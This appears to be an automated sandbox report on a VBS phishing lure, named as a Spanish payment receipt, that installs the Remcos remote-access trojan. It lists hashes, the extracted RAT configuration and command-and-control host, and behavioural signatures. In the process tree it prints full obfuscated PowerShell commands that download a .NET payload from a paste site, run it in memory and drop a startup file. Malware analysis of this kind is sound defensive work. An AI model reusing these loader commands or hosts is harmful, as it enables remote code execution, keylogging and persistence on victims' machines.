Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
07-08-2022 08:28
Static task
static1
Behavioral task
behavioral1
Sample
DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
Resource
win7-20220718-en
General
-
Target
DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
-
Size
205KB
-
MD5
a922f12891bb10b7fa058b7974950de6
-
SHA1
5a7e081ae52a26ebc08b0076493a73afbc58fc9e
-
SHA256
4287a4d23b855bf6ce9ff903998b58468c9dbf03255e486cda93f0115957edbf
-
SHA512
2d6f4865ccbe9b99113d7568aeeb0e6e6250f9cde87227ea5efc5aaee8aa1758679f02c046c6396feece1c9fd5607415403578bec90583ee4e7aa6a08506b5e3
Malware Config
Extracted
https://pasteio.com/download/xc3Ey7lGXuPW
Extracted
remcos
roda11
nod.con-ip.com:2405
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
logs
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
mcos1017-WJ8SF4
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 3984 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E9O8Nw.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E9O8Nw.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3984 set thread context of 4908 3984 powershell.exe CasPol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 3136 powershell.exe 3136 powershell.exe 3984 powershell.exe 3984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3136 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
CasPol.exepid process 4908 CasPol.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 4156 wrote to memory of 3136 4156 WScript.exe powershell.exe PID 4156 wrote to memory of 3136 4156 WScript.exe powershell.exe PID 3136 wrote to memory of 3984 3136 powershell.exe powershell.exe PID 3136 wrote to memory of 3984 3136 powershell.exe powershell.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe PID 3984 wrote to memory of 4908 3984 powershell.exe CasPol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE8ASQBVAEcAdwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AG⌚⌚⌚AaQBvAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQALwB4AGMAMwBFAHkANwBsAEcAWAB1AFAAVwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHcATgA4AE8AOQBFAGQAOQBxAFAA⌚⌚⌚gB4AC8AZABhAG8AbABuAHcAbwBkAC8AbQBvAGMALgBvAGkAZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcARQA5AE8AOABOAHcAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%OIUGw%', 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xc3Ey7lGXuPW'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('wN8O9Ed9qPRx/daolnwod/moc.oietsap//:sptth' , $RodaCopy , 'E9O8Nw' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD523909774a4f0358be8e03226d73fbd61
SHA14df262994ce4eb3935965881c1e2dc730668da94
SHA2566dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad
SHA5126ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b
-
memory/3136-131-0x0000024ACB470000-0x0000024ACB492000-memory.dmpFilesize
136KB
-
memory/3136-132-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmpFilesize
10.8MB
-
memory/3136-142-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmpFilesize
10.8MB
-
memory/3136-130-0x0000000000000000-mapping.dmp
-
memory/3984-133-0x0000000000000000-mapping.dmp
-
memory/3984-134-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmpFilesize
10.8MB
-
memory/3984-138-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmpFilesize
10.8MB
-
memory/4908-136-0x000000000043168C-mapping.dmp
-
memory/4908-139-0x0000000000400000-0x000000000047E000-memory.dmpFilesize
504KB
-
memory/4908-137-0x0000000000400000-0x000000000047E000-memory.dmpFilesize
504KB
-
memory/4908-135-0x0000000000400000-0x000000000047E000-memory.dmpFilesize
504KB
-
memory/4908-143-0x0000000000400000-0x000000000047E000-memory.dmpFilesize
504KB
-
memory/4908-144-0x0000000000400000-0x000000000047E000-memory.dmpFilesize
504KB